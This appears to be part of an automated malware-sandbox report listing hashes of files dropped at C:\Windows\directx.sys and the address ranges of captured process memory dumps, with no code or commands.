6681498b2cbc0cc9521137fe7408662a15cf2952e2f515e5c021a96732af1a524e3848623bd8b420e9b067d1e6569462ab24bd1d7da412014a040872ac4ce7f0

Download Submit
C:\Windows\directx.sys

Filesize
49B

MD5
568209230ea1566dec2115d59ddc9008

SHA1
77642b96c569bbe5532d239195b5df3e2cf0ee02

SHA256
6b72b97a283e3f47b61151c467bc70159b3fb405128abb93ce60112a30933acf

SHA512
f5d7aa1ffeb59eaf960377230d837c191a2003b54486db51f3300e5e163e5a3330f9ec7317e364030a13ac20aeeefb866339ffdbe9a78d8be87114212bef64ab

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
70ceb8242ea49b3e952ac0e17b10b541

SHA1
baa81c003163f80fa4f966b2b16fbd9e9e75e5b2

SHA256
ac41aec1010e4ad366241d4cb4f3bbc2a6eb1ec4a36c30c25bd6afac5dfbedd3

SHA512
6661ec92dc4bc1c8ff0294a8805dd05004d288e614a6b7ef70e6cfab304e6bc79a0310160f2255bd0332bca49670b5e2e55ac7f615d15ed2de89c41154bb74ab

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
baa7188a7a0558a94b6eb24bba65f33e

SHA1
c9adebffd4adf2d54febd7419a13f7c49476d034

SHA256
748bdbbf7021114eb5c90aabcaa7eaffb4606c644620922bddc9bd0407c8483d

SHA512
a0afed716b40f3f6520715351069f7a865b32e6c1593d8b0559ab50e0bbbf73fc5da6c10152783ba1ebf92346584b09a9d118fb0b2dd276212ec399fdc72cf70

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
283f6ee5ad32ee760e847a8e8690c5fc

SHA1
795ae9dbbfc15b13a41a30438ff7f6dbc0164783

SHA256
c8b26daa45e521e42251831b1b1407f5266b39e13f09307220a527b0583870e9

SHA512
ce42f33a84edb69f2ebf2efd3fe453caba0b70306e4380adab6139af18d43e8ae0bfb36f8530204f5c5787bb838ee73342e2df45a967ca8839983c0b0e667ff8

Download Submit
C:\Windows\directx.sys

Filesize
49B

MD5
e7148f4bb387a5ffe7bcb46c7549b875

SHA1
676ef24a88a41ad8c2921c95686f937e50b88c91

SHA256
e263011c6c3ef7e442d92d63b8a581755d4ccc2281858f37727c63aeb1d715bd

SHA512
020874180537539083f717cd21c0e2edb540e9432c37fcd13dfa3f1b948cf7348f6a909b2dc0eabe966ee3d548535349a39a9b5d9f76a2db3350175812c9ef3a

Download Submit
C:\Windows\directx.sys

Filesize
48B

MD5
b4886fee66f2c0795a90f044d39b2380

SHA1
4c6202058c4702eb3a0274795ed9e065194da75a

SHA256
8b762f9d86ff50ffae51d816b15b00fea7951b6b5eeac132aba6fc6eb66313d2

SHA512
8553fb7cd9139265b7a98b6104bf18331384eea2a467b5bab2482b02878fddb7f3a0f382a8b014f82faa2e67692844d13cbe24076c57a93f701929386dd8f7de

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
64c5d1bc82e5090b06cf780585185e1b

SHA1
2539acacec70a85d52b8702b0487f97dfc8ce74d

SHA256
40c355c0b0e3e7b2fb23b3a62738f289e950722503132d78a2b67fca2d31f472

SHA512
6cd042cfeb1e9dd3c3e7f11a3836027d884c0dd953cf1da4e2b17b4af8a6f3dfa62f28860e9f2e5c3b26bd578301ddf06814479eab5b05b09bd976d2383dab12

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
35dc25b8dcbab7b7c1f199c6f930b3b7

SHA1
cedbdfd67f8e95d93c0927415b93f065bb6196e4

SHA256
8f6f13d3570526eb21a35dbddfffd6703d2423d0fd92024d681c42ded1a7a685

SHA512
a3d44354f93a908afb1335881588f36e0019c2360448fdb7692c39dd23b0649aa76c7f6eef095b3b48949f28741af3f169634a44ca3c4a7bf2e88f3874bf9a98

Download Submit
C:\Windows\directx.sys

Filesize
77B

MD5
6215cc155c39b7e74210388b76285a83

SHA1
1153dcde1b58dda937b3222eca406a2747a7c324

SHA256
1d5db4f42b99f122791de557ecfaf4f6915c526bf8c8e86259f7ac8182675f57

SHA512
36afd5550bf408972db1ba0dc59a1d2dd5438598b02f8e0e7b8a7b533a2e992134361a50f1deabcbd28027cf0630988683eb7836b7fb7b510d48258b9a3f2876

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
99a6065182f5ac2ef563f407e35f0872

SHA1
fb05be5af08c18ee55c9ad78f386d73e2c1e9948

SHA256
e64970054014097178f69fa40b03735add5e546148b4943b4a5d534cbcd74fbe

SHA512
a9d7e87639661cd145605cdac393d0ba8b20afdcb477963172be79829b6c9e2d42ec448d8f27dca9548996ba3b0cad68e51a85706d82247a81443cf8b356123c

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
3b3962a33c1f97147e60ec04aea23931

SHA1
b8940a7e95b01d355078a4d8be81c4be3a2dd15d

SHA256
9d109b2531c388fdb4d4ffb6e17e550c0b544ad69d6a5c5aa1e662cd1f99026a

SHA512
dfbc2b4562f3420ae4dc255ce7c813cc9542d2ad740321bf722a7af3fa5b55fcf17a5331996237635b78dd3088c3b8edb7d85b77c15c9ecdc83c3339a78b24ec

Download Submit
C:\Windows\directx.sys

Filesize
91B

MD5
44a1028fb5d006396001313003a12b14

SHA1
568c7e68c01f3c777be4fa37e49289fc952eb01d

SHA256
6ab8e420c0b04526247b6acd0a34ce44c0a8be11a31363517dc891d005fae863

SHA512
b4d0dacf563f1917eebcf7fb47a34013a7189071529d4f14ea26913448e61c497fff03f02468b54c0613f1512ba698a1b47d10633b973e2c3b78ead781d0658e

Download Submit
memory/212-364-0x0000000000400000-0x0000000001A2E000-memory.dmp

Filesize
22.2MB

Download
memory/212-223-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/212-195-0x0000000000400000-0x0000000001A2E000-memory.dmp

Filesize
22.2MB

Download
memory/212-182-0x0000000000400000-0x0000000001A2E000-memory.dmp

Filesize
22.2MB

Download
memory/212-341-0x0000000003630000-0x0000000003657000-memory.dmp

Filesize
156KB

Download
memory/212-275-0x0000000000400000-0x0000000001A2E000-memory.dmp

Filesize
22.2MB

Download
memory/212-162-0x0000000001B10000-0x0000000001C10000-memory.dmp

Filesize
1024KB

Download
memory/212-165-0x0000000003630000-0x0000000003657000-memory.dmp

Filesize
156KB

Download
memory/212-309-0x0000000001B10000-0x0000000001C10000-memory.dmp

Filesize
1024KB

Download
memory/808-352-0x0000000002C40000-0x000000000352C000-memory.dmp

Filesize
8.9MB

Download
memory/808-353-0x0000000002845000-0x0000000002C3D000-memory.dmp

Filesize
4.0MB

Download
memory/856-97-0x0000000000400000-0x00000000005A2000-memory.dmp

Filesize
1.6MB

Download
memory/856-93-0x0000000000400000-0x00000000005A2000-memory.dmp

Filesize
1.6MB

Download
memory/856-131-0x0000000000400000-0x00000000005A2000-memory.dmp

Filesize
1.6MB

Download
memory/856-192-0x0000000000400000-0x00000000005A2000-memory.dmp

Filesize
1.6MB

Download
memory/856-91-0x0000000000400000-0x00000000005A2000-memory.dmp

Filesize
1.6MB

Download
memory/856-58-0x0000000000400000-0x00000000005A2000-memory.dmp

Filesize
1.6MB

Download
memory/856-213-0x0000000000400000-0x00000000005A2000-memory.dmp

Filesize
1.6MB

Download
memory/884-14-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/884-86-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1884-50-0x0000000000400000-0x00000000005A2000-memory.dmp

Filesize
1.6MB

Download
memory/1884-55-0x0000000000400000-0x00000000005A2000-memory.dmp

Filesize
1.6MB

Download
memory/1884-54-0x0000000000400000-0x00000000005A2000-memory.dmp

Filesize
1.6MB

Download
memory/1884-51-0x0000000000400000-0x00000000005A2000-memory.dmp

Filesize
1.6MB

Download
memory/1948-130-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1948-194-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2452-210-0x0000000004E30000-0x0000000004E42000-memory.dmp

Filesize
72KB

Download
memory/2452-358-0x0000000006390000-0x00000000063F6000-memory.dmp

Filesize
408KB

Download
memory/2452-339-0x0000000006400000-0x00000000065C2000-memory.dmp

Filesize
1.8MB

Download
memory/2452-376-0x00000000069B0000-0x0000000006A26000-memory.dmp

Filesize
472KB

Download
memory/2452-374-0x0000000006810000-0x00000000068A2000-memory.dmp

Filesize
584KB

Download
memory/2452-343-0x0000000006B00000-0x000000000702C000-memory.dmp

Filesize
5.2MB

Download
memory/2452-190-0x00000000727D0000-0x0000000072F80000-memory.dmp

Filesize
7.7MB

Download
memory/2452-372-0x00000000075E0000-0x0000000007B84000-memory.dmp

Filesize
5.6MB

Download
memory/2452-241-0x0000000005110000-0x000000000521A000-memory.dmp

Filesize
1.0MB

Download
memory/2452-191-0x0000000000440000-0x000000000045E000-memory.dmp

Filesize
120KB

Download
memory/2452-215-0x0000000004ED0000-0x0000000004F1C000-memory.dmp

Filesize
304KB

Download
memory/2452-214-0x00000000029B0000-0x00000000029C0000-memory.dmp

Filesize
64KB

Download
memory/2452-211-0x0000000004E90000-0x0000000004ECC000-memory.dmp

Filesize
240KB

Download
memory/2452-209-0x0000000005450000-0x0000000005A68000-memory.dmp

Filesize
6.1MB

Download
memory/2908-359-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/2956-285-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/2956-271-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/2976-357-0x0000000001FC0000-0x0000000001FC1000-memory.dmp

Filesize
4KB

Download
memory/2976-196-0x0000000000400000-0x00000000004BC000-memory.dmp

Filesize
752KB

Download
memory/2976-168-0x0000000001FC0000-0x0000000001FC1000-memory.dmp

Filesize
4KB

Download
memory/3808-342-0x0000000001FC0000-0x00000000020C0000-memory.dmp

Filesize
1024KB

Download
memory/3808-345-0x0000000003BE0000-0x0000000003C47000-memory.dmp

Filesize
412KB

Download
memory/3808-356-0x0000000000400000-0x0000000001F27000-memory.dmp

Filesize
27.2MB

Download
memory/4128-2-0x0000000002C80000-0x0000000002C90000-memory.dmp

Filesize
64KB

Download
memory/4128-70-0x00007FFDCED00000-0x00007FFDCF7C1000-memory.dmp

Filesize
10.8MB

Download
memory/4128-0-0x0000000000B50000-0x0000000000B58000-memory.dmp

Filesize
32KB

Download
memory/4128-1-0x00007FFDCED00000-0x00007FFDCF7C1000-memory.dmp

Filesize
10.8MB

Download
memory/4128-73-0x0000000002C80000-0x0000000002C90000-memory.dmp

Filesize
64KB

Download
memory/4348-75-0x0000000005740000-0x0000000005741000-memory.dmp

Filesize
4KB

Download
memory/4348-83-0x0000000005760000-0x0000000005761000-memory.dmp

Filesize
4KB

Download
memory/4348-284-0x0000000000D90000-0x0000000001326000-memory.dmp

Filesize
5.6MB

Download
memory/4348-141-0x0000000000D90000-0x0000000001326000-memory.dmp

Filesize
5.6MB

Download
memory/4348-82-0x0000000005730000-0x0000000005731000-memory.dmp

Filesize
4KB

Download
memory/4348-84-0x0000000005790000-0x0000000005791000-memory.dmp

Filesize
4KB

Download
memory/4348-87-0x00000000057C0000-0x00000000057C2000-memory.dmp

Filesize
8KB

Download
memory/4348-85-0x00000000056F0000-0x00000000056F1000-memory.dmp

Filesize
4KB

Download
memory/4348-71-0x0000000000D90000-0x0000000001326000-memory.dmp

Filesize
5.6MB

Download
memory/4348-81-0x00000000057A0000-0x00000000057A1000-memory.dmp

Filesize
4KB

Download
memory/4348-183-0x0000000000D90000-0x0000000001326000-memory.dmp

Filesize
5.6MB

Download
memory/4348-80-0x0000000005750000-0x0000000005751000-memory.dmp

Filesize
4KB

Download
memory/4348-92-0x0000000000D90000-0x0000000001326000-memory.dmp

Filesize
5.6MB

Download
memory/4348-72-0x00000000775A4000-0x00000000775A6000-memory.dmp

Filesize
8KB

Download
memory/4348-74-0x0000000000D90000-0x0000000001326000-memory.dmp

Filesize
5.6MB

Download
memory/4348-79-0x0000000005700000-0x0000000005701000-memory.dmp

Filesize
4KB

Download
memory/4348-77-0x0000000005710000-0x0000000005711000-memory.dmp

Filesize
4KB

Download
memory/4348-76-0x0000000005720000-0x0000000005721000-memory.dmp

Filesize
4KB

Download
memory/4348-193-0x0000000000D90000-0x0000000001326000-memory.dmp

Filesize
5.6MB

Download
memory/4348-78-0x0000000005780000-0x0000000005781000-memory.dmp

Filesize
4KB

Download
memory/4620-163-0x0000000001400000-0x0000000001401000-memory.dmp

Filesize
4KB

Download
memory/4620-148-0x00000000013D0000-0x00000000013D1000-memory.dmp

Filesize
4KB

Download
memory/4620-116-0x0000000000140000-0x0000000000E21000-memory.dmp

Filesize
12.9MB

Download
memory/4620-160-0x00000000013F0000-0x00000000013F1000-memory.dmp

Filesize
4KB

Download
memory/4620-143-0x0000000001380000-0x0000000001381000-memory.dmp

Filesize
4KB

Download
memory/4620-308-0x0000000000140000-0x0000000000E21000-memory.dmp

Filesize
12.9MB

Download
memory/4620-175-0x0000000000140000-0x0000000000E21000-memory.dmp

Filesize
12.9MB

Download
memory/4620-153-0x00000000013E0000-0x00000000013E1000-memory.dmp

Filesize
4KB

Download
memory/4620-146-0x0000000001390000-0x0000000001391000-memory.dmp

Filesize
4KB

Download
memory/4620-142-0x0000000000140000-0x0000000000E21000-memory.dmp

Filesize
12.9MB

Download
memory/4712-89-0x0000000000400000-0x00000000004BC000-memory.dmp

Filesize
752KB

Download
memory/4712-90-0x00000000006A0000-0x00000000006A1000-memory.dmp

Filesize
4KB

Download
memory/4712-20-0x00000000006A0000-0x00000000006A1000-memory.dmp

Filesize
4KB

Download
memory/4964-310-0x00000000024E0000-0x00000000024E1000-memory.dmp

Filesize
4KB

Download
memory/5028-207-0x00000000727D0000-0x0000000072F80000-memory.dmp

Filesize
7.7MB

Download
memory/5028-206-0x0000000000A50000-0x0000000001144000-memory.dmp

Filesize
7.0MB

Download
memory/5028-252-0x00000000727D0000-0x0000000072F80000-memory.dmp

Filesize
7.7MB

Download